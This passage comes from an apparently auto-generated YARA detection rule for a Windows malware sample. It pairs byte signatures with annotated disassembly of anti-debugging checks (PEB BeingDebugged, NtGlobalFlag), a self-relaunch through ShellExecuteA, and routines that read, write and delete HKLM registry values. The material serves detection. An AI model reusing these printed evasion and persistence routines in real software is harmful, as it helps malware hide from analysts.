0x004032ff + */ + $c19 = { 55 8B EC 81 EC 14 0C 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? } + /* +Basic Block at 0x00403530@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB BeingDebugged flag + .text:0x00403530 + .text:0x00403530 FUNC: int cdecl sub_00403530( int arg0, int arg1, ) [2 XREFS] + .text:0x00403530 + .text:0x00403530 Stack Variables: (offset from initial top of stack) + .text:0x00403530 8: int arg1 + .text:0x00403530 4: int arg0 + .text:0x00403530 -8: int local8 + .text:0x00403530 -1032: int local1032 + .text:0x00403530 -1036: int local1036 + .text:0x00403530 -2060: int local2060 + .text:0x00403530 -2064: int local2064 + .text:0x00403530 -2068: int local2068 + .text:0x00403530 -2072: int local2072 + .text:0x00403530 -2076: int local2076 + .text:0x00403530 -2080: int local2080 + .text:0x00403530 -3104: int local3104 + .text:0x00403530 -4128: int local4128 + .text:0x00403530 -5152: int local5152 + .text:0x00403530 -6176: int local6176 + .text:0x00403530 -6180: int local6180 + .text:0x00403530 -6184: int local6184 + .text:0x00403530 -6188: int local6188 + .text:0x00403530 -6192: int local6192 + .text:0x00403530 -6196: int local6196 + .text:0x00403530 -6200: int local6200 + .text:0x00403530 -6204: int local6204 + .text:0x00403530 + .text:0x00403530 55 push ebp + .text:0x00403531 8bec mov ebp,esp + .text:0x00403533 b838180000 mov eax,0x00001838 + .text:0x00403538 e833040000 call 0x00403970 ;__alloca_probe() + .text:0x0040353d 53 push ebx + .text:0x0040353e 56 push esi + .text:0x0040353f 57 push edi + .text:0x00403540 c785dce7ffff0000 mov dword [ebp - 6180],0 + .text:0x0040354a c785d8e7ffff0000 mov dword [ebp - 6184],0 + .text:0x00403554 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040355a 8a5802 mov bl,byte [eax + 2] + .text:0x0040355d 889de0e7ffff mov byte [ebp - 6176],bl + .text:0x00403563 0fbe85e0e7ffff movsx eax,byte [ebp - 6176] + .text:0x0040356a 85c0 test eax,eax + .text:0x0040356c 7405 jz 0x00403573 + */ + $c20 = { 55 8B EC B8 38 18 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? } + /* +Basic Block at 0x00401000@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - create process on Windows + .text:0x00401000 Segment: .text (40960 bytes) + .text:0x00401000 + .text:0x00401000 FUNC: int cdecl sub_00401000( ) [158 XREFS] + .text:0x00401000 + .text:0x00401000 Stack Variables: (offset from initial top of stack) + .text:0x00401000 -264: int local264 + .text:0x00401000 -524: int local524 + .text:0x00401000 + .text:0x00401000 55 push ebp + .text:0x00401001 8bec mov ebp,esp + .text:0x00401003 81ec08020000 sub esp,520 + .text:0x00401009 53 push ebx + .text:0x0040100a 56 push esi + .text:0x0040100b 57 push edi + .text:0x0040100c 6804010000 push 260 + .text:0x00401011 8d85f8fdffff lea eax,dword [ebp - 520] + .text:0x00401017 50 push eax + .text:0x00401018 6a00 push 0 + .text:0x0040101a ff155cb04000 call dword [0x0040b05c] ;kernel32.GetModuleFileNameA(0,local524,260) + .text:0x00401020 6804010000 push 260 + .text:0x00401025 8d8df8fdffff lea ecx,dword [ebp - 520] + .text:0x0040102b 51 push ecx + .text:0x0040102c 8d95f8fdffff lea edx,dword [ebp - 520] + .text:0x00401032 52 push edx + .text:0x00401033 ff1564b04000 call dword [0x0040b064] ;kernel32.GetShortPathNameA(local524,local524,260) + .text:0x00401039 bf40c04000 mov edi,0x0040c040 + .text:0x0040103e 8d95fcfeffff lea edx,dword [ebp - 260] + .text:0x00401044 83c9ff or ecx,0xffffffff + .text:0x00401047 33c0 xor eax,eax + .text:0x00401049 f2ae repnz: scasb + .text:0x0040104b f7d1 not ecx + .text:0x0040104d 2bf9 sub edi,ecx + .text:0x0040104f 8bf7 mov esi,edi + .text:0x00401051 8bc1 mov eax,ecx + .text:0x00401053 8bfa mov edi,edx + .text:0x00401055 c1e902 shr ecx,2 + .text:0x00401058 f3a5 rep: movsd + .text:0x0040105a 8bc8 mov ecx,eax + .text:0x0040105c 83e103 and ecx,3 + .text:0x0040105f f3a4 rep: movsb + .text:0x00401061 8dbdf8fdffff lea edi,dword [ebp - 520] + .text:0x00401067 8d95fcfeffff lea edx,dword [ebp - 260] + .text:0x0040106d 83c9ff or ecx,0xffffffff + .text:0x00401070 33c0 xor eax,eax + .text:0x00401072 f2ae repnz: scasb + .text:0x00401074 f7d1 not ecx + .text:0x00401076 2bf9 sub edi,ecx + .text:0x00401078 8bf7 mov esi,edi + .text:0x0040107a 8bd9 mov ebx,ecx + .text:0x0040107c 8bfa mov edi,edx + .text:0x0040107e 83c9ff or ecx,0xffffffff + .text:0x00401081 33c0 xor eax,eax + .text:0x00401083 f2ae repnz: scasb + .text:0x00401085 83c7ff add edi,0xffffffff + .text:0x00401088 8bcb mov ecx,ebx + .text:0x0040108a c1e902 shr ecx,2 + .text:0x0040108d f3a5 rep: movsd + .text:0x0040108f 8bcb mov ecx,ebx + .text:0x00401091 83e103 and ecx,3 + .text:0x00401094 f3a4 rep: movsb + .text:0x00401096 bf38c04000 mov edi,0x0040c038 + .text:0x0040109b 8d95fcfeffff lea edx,dword [ebp - 260] + .text:0x004010a1 83c9ff or ecx,0xffffffff + .text:0x004010a4 33c0 xor eax,eax + .text:0x004010a6 f2ae repnz: scasb + .text:0x004010a8 f7d1 not ecx + .text:0x004010aa 2bf9 sub edi,ecx + .text:0x004010ac 8bf7 mov esi,edi + .text:0x004010ae 8bd9 mov ebx,ecx + .text:0x004010b0 8bfa mov edi,edx + .text:0x004010b2 83c9ff or ecx,0xffffffff + .text:0x004010b5 33c0 xor eax,eax + .text:0x004010b7 f2ae repnz: scasb + .text:0x004010b9 83c7ff add edi,0xffffffff + .text:0x004010bc 8bcb mov ecx,ebx + .text:0x004010be c1e902 shr ecx,2 + .text:0x004010c1 f3a5 rep: movsd + .text:0x004010c3 8bcb mov ecx,ebx + .text:0x004010c5 83e103 and ecx,3 + .text:0x004010c8 f3a4 rep: movsb + .text:0x004010ca 6a00 push 0 + .text:0x004010cc 6a00 push 0 + .text:0x004010ce 8d85fcfeffff lea eax,dword [ebp - 260] + .text:0x004010d4 50 push eax + .text:0x004010d5 6830c04000 push 0x0040c030 + .text:0x004010da 6a00 push 0 + .text:0x004010dc 6a00 push 0 + .text:0x004010de ff1538b14000 call dword [0x0040b138] ;shell32.ShellExecuteA(0,0,0x0040c030,local264,0,0) + .text:0x004010e4 6a00 push 0 + .text:0x004010e6 e879270000 call 0x00403864 ;_exit(0) + .text:0x004010eb 5f pop edi + .text:0x004010ec 5e pop esi + .text:0x004010ed 5b pop ebx + .text:0x004010ee 8be5 mov esp,ebp + .text:0x004010f0 5d pop ebp + .text:0x004010f1 c3 ret + */ + $c21 = { 55 8B EC 81 EC 08 02 00 00 53 56 57 68 04 01 00 00 8D 85 ?? ?? ?? ?? 50 6A 00 FF 15 ?? ?? ?? ?? 68 04 01 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? BF 40 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8D BD ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF 38 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 6A 00 6A 00 8D 85 ?? ?? ?? ?? 50 68 30 C0 40 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 6A 00 E8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401100@7faafc7e4a5c736ebfee6abbbc812d80 with 2 features: + - check for PEB NtGlobalFlag flag + - query or enumerate registry value + .text:0x00401100 + .text:0x00401100 FUNC: int cdecl sub_00401100( ) [2 XREFS] + .text:0x00401100 + .text:0x00401100 Stack Variables: (offset from initial top of stack) + .text:0x00401100 -8: int local8 + .text:0x00401100 -12: int local12 + .text:0x00401100 -16: int local16 + .text:0x00401100 -20: int local20 + .text:0x00401100 -24: int local24 + .text:0x00401100 + .text:0x00401100 55 push ebp + .text:0x00401101 8bec mov ebp,esp + .text:0x00401103 83ec14 sub esp,20 + .text:0x00401106 53 push ebx + .text:0x00401107 56 push esi + .text:0x00401108 57 push edi + .text:0x00401109 c745f000000000 mov dword [ebp - 16],0 + .text:0x00401110 c745ec00000000 mov dword [ebp - 20],0 + .text:0x00401117 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040111d 8a5802 mov bl,byte [eax + 2] + .text:0x00401120 885df4 mov byte [ebp - 12],bl + .text:0x00401123 0fbe45f4 movsx eax,byte [ebp - 12] + .text:0x00401127 85c0 test eax,eax + .text:0x00401129 7405 jz 0x00401130 + .text:0x0040112b e8d0feffff call 0x00401000 ;sub_00401000() + .text:0x00401130 loc_00401130: [1 XREFS] + .text:0x00401130 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401136 8b4018 mov eax,dword [eax + 24] + .text:0x00401139 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x0040113d 8945f0 mov dword [ebp - 16],eax + .text:0x00401140 837df000 cmp dword [ebp - 16],0 + .text:0x00401144 7405 jz 0x0040114b + .text:0x00401146 e8b5feffff call 0x00401000 ;sub_00401000() + .text:0x0040114b loc_0040114b: [1 XREFS] + .text:0x0040114b 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401151 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00401155 83e870 sub eax,112 + .text:0x00401158 8945ec mov dword [ebp - 20],eax + .text:0x0040115b 837dec00 cmp dword [ebp - 20],0 + .text:0x0040115f 7505 jnz 0x00401166 + .text:0x00401161 e89afeffff call 0x00401000 ;sub_00401000() + .text:0x00401166 loc_00401166: [1 XREFS] + .text:0x00401166 8d4df8 lea ecx,dword [ebp - 8] + .text:0x00401169 51 push ecx + .text:0x0040116a 683f000f00 push 0x000f003f + .text:0x0040116f 6a00 push 0 + .text:0x00401171 6858c04000 push 0x0040c058 + .text:0x00401176 6802000080 push 0x80000002 + .text:0x0040117b ff1520b04000 call dword [0x0040b020] ;advapi32.RegOpenKeyExA(0x80000002,0x0040c058,0,0x000f003f,local12) + .text:0x00401181 85c0 test eax,eax + .text:0x00401183 7404 jz 0x00401189 + .text:0x00401185 33c0 xor eax,eax + .text:0x00401187 eb3d jmp 0x004011c6 + .text:0x00401189 loc_00401189: [1 XREFS] + .text:0x00401189 6a00 push 0 + .text:0x0040118b 6a00 push 0 + .text:0x0040118d 6a00 push 0 + .text:0x0040118f 6a00 push 0 + .text:0x00401191 6848c04000 push 0x0040c048 + .text:0x00401196 8b55f8 mov edx,dword [ebp - 8] + .text:0x00401199 52 push edx + .text:0x0040119a ff1524b04000 call dword [0x0040b024] ;advapi32.RegQueryValueExA(0xfefefefe,0x0040c048,0,0,0,0) + .text:0x004011a0 8945fc mov dword [ebp - 4],eax + .text:0x004011a3 837dfc00 cmp dword [ebp - 4],0 + .text:0x004011a7 740e jz 0x004011b7 + .text:0x004011a9 8b45f8 mov eax,dword [ebp - 8] + .text:0x004011ac 50 push eax + .text:0x004011ad ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004011b3 33c0 xor eax,eax + .text:0x004011b5 eb0f jmp 0x004011c6 + .text:0x004011b7 loc_004011b7: [1 XREFS] + .text:0x004011b7 8b4df8 mov ecx,dword [ebp - 8] + .text:0x004011ba 51 push ecx + .text:0x004011bb ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004011c1 b801000000 mov eax,1 + .text:0x004011c6 loc_004011c6: [2 XREFS] + .text:0x004011c6 5f pop edi + .text:0x004011c7 5e pop esi + .text:0x004011c8 5b pop ebx + .text:0x004011c9 8be5 mov esp,ebp + .text:0x004011cb 5d pop ebp + .text:0x004011cc c3 ret + */ + $c22 = { 55 8B EC 83 EC 14 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 45 ?? 83 7D ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 45 ?? 83 7D ?? 00 75 ?? E8 ?? ?? ?? ?? 8D 4D ?? 51 68 3F 00 0F 00 6A 00 68 58 C0 40 00 68 02 00 00 80 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 EB ?? 6A 00 6A 00 6A 00 6A 00 68 48 C0 40 00 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 74 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 33 C0 EB ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? B8 01 00 00 00 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004011d0@7faafc7e4a5c736ebfee6abbbc812d80 with 2 features: + - check for PEB NtGlobalFlag flag + - set registry value + .text:0x004011d0 + .text:0x004011d0 FUNC: int cdecl sub_004011d0( int arg0, int arg1, int arg2, int arg3, ) [6 XREFS] + .text:0x004011d0 + .text:0x004011d0 Stack Variables: (offset from initial top of stack) + .text:0x004011d0 16: int arg3 + .text:0x004011d0 12: int arg2 + .text:0x004011d0 8: int arg1 + .text:0x004011d0 4: int arg0 + .text:0x004011d0 -8: int local8 + .text:0x004011d0 -4108: int local4108 + .text:0x004011d0 -4112: int local4112 + .text:0x004011d0 -4116: int local4116 + .text:0x004011d0 -4120: int local4120 + .text:0x004011d0 -4124: int local4124 + .text:0x004011d0 + .text:0x004011d0 55 push ebp + .text:0x004011d1 8bec mov ebp,esp + .text:0x004011d3 b818100000 mov eax,0x00001018 + .text:0x004011d8 e893270000 call 0x00403970 ;__alloca_probe() + .text:0x004011dd 53 push ebx + .text:0x004011de 56 push esi + .text:0x004011df 57 push edi + .text:0x004011e0 c785ecefffff0000 mov dword [ebp - 4116],0 + .text:0x004011ea c785e8efffff0000 mov dword [ebp - 4120],0 + .text:0x004011f4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004011fa 8a5802 mov bl,byte [eax + 2] + .text:0x004011fd 889df0efffff mov byte [ebp - 4112],bl + .text:0x00401203 0fbe85f0efffff movsx eax,byte [ebp - 4112] + .text:0x0040120a 85c0 test eax,eax + .text:0x0040120c 7405 jz 0x00401213 + .text:0x0040120e e8edfdffff call 0x00401000 ;sub_00401000() + .text:0x00401213 loc_00401213: [1 XREFS] + .text:0x00401213 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401219 8b4018 mov eax,dword [eax + 24] + .text:0x0040121c 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00401220 8985ecefffff mov dword [ebp - 4116],eax + .text:0x00401226 83bdecefffff00 cmp dword [ebp - 4116],0 + .text:0x0040122d 7405 jz 0x00401234 + .text:0x0040122f e8ccfdffff call 0x00401000 ;sub_00401000() + .text:0x00401234 loc_00401234: [1 XREFS] + .text:0x00401234 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040123a 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x0040123e 83e870 sub eax,112 + .text:0x00401241 8985e8efffff mov dword [ebp - 4120],eax + .text:0x00401247 83bde8efffff00 cmp dword [ebp - 4120],0 + .text:0x0040124e 7505 jnz 0x00401255 + .text:0x00401250 e8abfdffff call 0x00401000 ;sub_00401000() + .text:0x00401255 loc_00401255: [1 XREFS] + .text:0x00401255 b900040000 mov ecx,1024 + .text:0x0040125a 33c0 xor eax,eax + .text:0x0040125c 8dbdf8efffff lea edi,dword [ebp - 4104] + .text:0x00401262 f3ab rep: stosd + .text:0x00401264 aa stosb + .text:0x00401265 8d8df8efffff lea ecx,dword [ebp - 4104] + .text:0x0040126b 894dfc mov dword [ebp - 4],ecx + .text:0x0040126e 8b7d08 mov edi,dword [ebp + 8] + .text:0x00401271 8b55fc mov edx,dword [ebp - 4] + .text:0x00401274 83c9ff or ecx,0xffffffff + .text:0x00401277 33c0 xor eax,eax + .text:0x00401279 f2ae repnz: scasb + .text:0x0040127b f7d1 not ecx + .text:0x0040127d 2bf9 sub edi,ecx + .text:0x0040127f 8bf7 mov esi,edi + .text:0x00401281 8bc1 mov eax,ecx + .text:0x00401283 8bfa mov edi,edx + .text:0x00401285 c1e902 shr ecx,2 + .text:0x00401288 f3a5 rep: movsd + .text:0x0040128a 8bc8 mov ecx,eax + .text:0x0040128c 83e103 and ecx,3 + .text:0x0040128f f3a4 rep: movsb + .text:0x00401291 8b7d08 mov edi,dword [ebp + 8] + .text:0x00401294 83c9ff or ecx,0xffffffff + .text:0x00401297 33c0 xor eax,eax + .text:0x00401299 f2ae repnz: scasb + .text:0x0040129b f7d1 not ecx + .text:0x0040129d 83c1ff add ecx,0xffffffff + .text:0x004012a0 8b55fc mov edx,dword [ebp - 4] + .text:0x004012a3 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x004012a7 8945fc mov dword [ebp - 4],eax + .text:0x004012aa 8b7d0c mov edi,dword [ebp + 12] + .text:0x004012ad 8b55fc mov edx,dword [ebp - 4] + .text:0x004012b0 83c9ff or ecx,0xffffffff + .text:0x004012b3 33c0 xor eax,eax + .text:0x004012b5 f2ae repnz: scasb + .text:0x004012b7 f7d1 not ecx + .text:0x004012b9 2bf9 sub edi,ecx + .text:0x004012bb 8bf7 mov esi,edi + .text:0x004012bd 8bc1 mov eax,ecx + .text:0x004012bf 8bfa mov edi,edx + .text:0x004012c1 c1e902 shr ecx,2 + .text:0x004012c4 f3a5 rep: movsd + .text:0x004012c6 8bc8 mov ecx,eax + .text:0x004012c8 83e103 and ecx,3 + .text:0x004012cb f3a4 rep: movsb + .text:0x004012cd 8b7d0c mov edi,dword [ebp + 12] + .text:0x004012d0 83c9ff or ecx,0xffffffff + .text:0x004012d3 33c0 xor eax,eax + .text:0x004012d5 f2ae repnz: scasb + .text:0x004012d7 f7d1 not ecx + .text:0x004012d9 83c1ff add ecx,0xffffffff + .text:0x004012dc 8b55fc mov edx,dword [ebp - 4] + .text:0x004012df 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x004012e3 8945fc mov dword [ebp - 4],eax + .text:0x004012e6 8b7d10 mov edi,dword [ebp + 16] + .text:0x004012e9 8b55fc mov edx,dword [ebp - 4] + .text:0x004012ec 83c9ff or ecx,0xffffffff + .text:0x004012ef 33c0 xor eax,eax + .text:0x004012f1 f2ae repnz: scasb + .text:0x004012f3 f7d1 not ecx + .text:0x004012f5 2bf9 sub edi,ecx + .text:0x004012f7 8bf7 mov esi,edi + .text:0x004012f9 8bc1 mov eax,ecx + .text:0x004012fb 8bfa mov edi,edx + .text:0x004012fd c1e902 shr ecx,2 + .text:0x00401300 f3a5 rep: movsd + .text:0x00401302 8bc8 mov ecx,eax + .text:0x00401304 83e103 and ecx,3 + .text:0x00401307 f3a4 rep: movsb + .text:0x00401309 8b7d10 mov edi,dword [ebp + 16] + .text:0x0040130c 83c9ff or ecx,0xffffffff + .text:0x0040130f 33c0 xor eax,eax + .text:0x00401311 f2ae repnz: scasb + .text:0x00401313 f7d1 not ecx + .text:0x00401315 83c1ff add ecx,0xffffffff + .text:0x00401318 8b55fc mov edx,dword [ebp - 4] + .text:0x0040131b 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x0040131f 8945fc mov dword [ebp - 4],eax + .text:0x00401322 8b7d14 mov edi,dword [ebp + 20] + .text:0x00401325 8b55fc mov edx,dword [ebp - 4] + .text:0x00401328 83c9ff or ecx,0xffffffff + .text:0x0040132b 33c0 xor eax,eax + .text:0x0040132d f2ae repnz: scasb + .text:0x0040132f f7d1 not ecx + .text:0x00401331 2bf9 sub edi,ecx + .text:0x00401333 8bf7 mov esi,edi + .text:0x00401335 8bc1 mov eax,ecx + .text:0x00401337 8bfa mov edi,edx + .text:0x00401339 c1e902 shr ecx,2 + .text:0x0040133c f3a5 rep: movsd + .text:0x0040133e 8bc8 mov ecx,eax + .text:0x00401340 83e103 and ecx,3 + .text:0x00401343 f3a4 rep: movsb + .text:0x00401345 8b7d14 mov edi,dword [ebp + 20] + .text:0x00401348 83c9ff or ecx,0xffffffff + .text:0x0040134b 33c0 xor eax,eax + .text:0x0040134d f2ae repnz: scasb + .text:0x0040134f f7d1 not ecx + .text:0x00401351 83c1ff add ecx,0xffffffff + .text:0x00401354 8b55fc mov edx,dword [ebp - 4] + .text:0x00401357 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x0040135b 8945fc mov dword [ebp - 4],eax + .text:0x0040135e 6a00 push 0 + .text:0x00401360 8d8df4efffff lea ecx,dword [ebp - 4108] + .text:0x00401366 51 push ecx + .text:0x00401367 6a00 push 0 + .text:0x00401369 683f000f00 push 0x000f003f + .text:0x0040136e 6a00 push 0 + .text:0x00401370 6a00 push 0 + .text:0x00401372 6a00 push 0 + .text:0x00401374 6858c04000 push 0x0040c058 + .text:0x00401379 6802000080 push 0x80000002 + .text:0x0040137e ff1518b04000 call dword [0x0040b018] ;advapi32.RegCreateKeyExA(0x80000002,0x0040c058,0,0,0,0x000f003f,0,local4112,0) + .text:0x00401384 85c0 test eax,eax + .text:0x00401386 7407 jz 0x0040138f + .text:0x00401388 b801000000 mov eax,1 + .text:0x0040138d eb49 jmp 0x004013d8 + .text:0x0040138f loc_0040138f: [1 XREFS] + .text:0x0040138f 6800100000 push 0x00001000 + .text:0x00401394 8d95f8efffff lea edx,dword [ebp - 4104] + .text:0x0040139a 52 push edx + .text:0x0040139b 6a03 push 3 + .text:0x0040139d 6a00 push 0 + .text:0x0040139f 6848c04000 push 0x0040c048 + .text:0x004013a4 8b85f4efffff mov eax,dword [ebp - 4108] + .text:0x004013aa 50 push eax + .text:0x004013ab ff151cb04000 call dword [0x0040b01c] ;advapi32.RegSetValueExA(0xfefefefe,0x0040c048,0,3,local4108,0x00001000) + .text:0x004013b1 85c0 test eax,eax + .text:0x004013b3 7414 jz 0x004013c9 + .text:0x004013b5 8b8df4efffff mov ecx,dword [ebp - 4108] + .text:0x004013bb 51 push ecx + .text:0x004013bc ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004013c2 b801000000 mov eax,1 + .text:0x004013c7 eb0f jmp 0x004013d8 + .text:0x004013c9 loc_004013c9: [1 XREFS] + .text:0x004013c9 8b95f4efffff mov edx,dword [ebp - 4108] + .text:0x004013cf 52 push edx + .text:0x004013d0 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004013d6 33c0 xor eax,eax + .text:0x004013d8 loc_004013d8: [2 XREFS] + .text:0x004013d8 5f pop edi + .text:0x004013d9 5e pop esi + .text:0x004013da 5b pop ebx + .text:0x004013db 8be5 mov esp,ebp + .text:0x004013dd 5d pop ebp + .text:0x004013de c3 ret + */ + $c23 = { 55 8B EC B8 18 10 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? B9 00 04 00 00 33 C0 8D BD ?? ?? ?? ?? F3 AB AA 8D 8D ?? ?? ?? ?? 89 4D ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 6A 00 8D 8D ?? ?? ?? ?? 51 6A 00 68 3F 00 0F 00 6A 00 6A 00 6A 00 68 58 C0 40 00 68 02 00 00 80 FF 15 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 EB ?? 68 00 10 00 00 8D 95 ?? ?? ?? ?? 52 6A 03 6A 00 68 48 C0 40 00 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004013e0@7faafc7e4a5c736ebfee6abbbc812d80 with 2 features: + - check for PEB NtGlobalFlag flag + - delete registry value + .text:0x004013e0 + .text:0x004013e0 FUNC: int cdecl sub_004013e0( ) [2 XREFS] + .text:0x004013e0 + .text:0x004013e0 Stack Variables: (offset from initial top of stack) + .text:0x004013e0 -8: int local8 + .text:0x004013e0 -12: int local12 + .text:0x004013e0 -16: int local16 + .text:0x004013e0 -20: int local20 + .text:0x004013e0 -24: int local24 + .text:0x004013e0 + .text:0x004013e0 55 push ebp + .text:0x004013e1 8bec mov ebp,esp + .text:0x004013e3 83ec14 sub esp,20 + .text:0x004013e6 53 push ebx + .text:0x004013e7 56 push esi + .text:0x004013e8 57 push edi + .text:0x004013e9 c745f000000000 mov dword [ebp - 16],0 + .text:0x004013f0 c745ec00000000 mov dword [ebp - 20],0 + .text:0x004013f7 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004013fd 8a5802 mov bl,byte [eax + 2] + .text:0x00401400 885df4 mov byte [ebp - 12],bl + .text:0x00401403 0fbe45f4 movsx eax,byte [ebp - 12] + .text:0x00401407 85c0 test eax,eax + .text:0x00401409 7405 jz 0x00401410 + .text:0x0040140b e8f0fbffff call 0x00401000 ;sub_00401000() + .text:0x00401410 loc_00401410: [1 XREFS] + .text:0x00401410 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401416 8b4018 mov eax,dword [eax + 24] + .text:0x00401419 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x0040141d 8945f0 mov dword [ebp - 16],eax + .text:0x00401420 837df000 cmp dword [ebp - 16],0 + .text:0x00401424 7405 jz 0x0040142b + .text:0x00401426 e8d5fbffff call 0x00401000 ;sub_00401000() + .text:0x0040142b loc_0040142b: [1 XREFS] + .text:0x0040142b 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401431 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x00401435 83e870 sub eax,112 + .text:0x00401438 8945ec mov dword [ebp - 20],eax + .text:0x0040143b 837dec00 cmp dword [ebp - 20],0 + .text:0x0040143f 7505 jnz 0x00401446 + .text:0x00401441 e8bafbffff call 0x00401000 ;sub_00401000() + .text:0x00401446 loc_00401446: [1 XREFS] + .text:0x00401446 6a00 push 0 + .text:0x00401448 8d4df8 lea ecx,dword [ebp - 8] + .text:0x0040144b 51 push ecx + .text:0x0040144c 6a00 push 0 + .text:0x0040144e 683f000f00 push 0x000f003f + .text:0x00401453 6a00 push 0 + .text:0x00401455 6a00 push 0 + .text:0x00401457 6a00 push 0 + .text:0x00401459 6858c04000 push 0x0040c058 + .text:0x0040145e 6802000080 push 0x80000002 + .text:0x00401463 ff1518b04000 call dword [0x0040b018] ;advapi32.RegCreateKeyExA(0x80000002,0x0040c058,0,0,0,0x000f003f,0,local12,0) + .text:0x00401469 85c0 test eax,eax + .text:0x0040146b 7407 jz 0x00401474 + .text:0x0040146d b801000000 mov eax,1 + 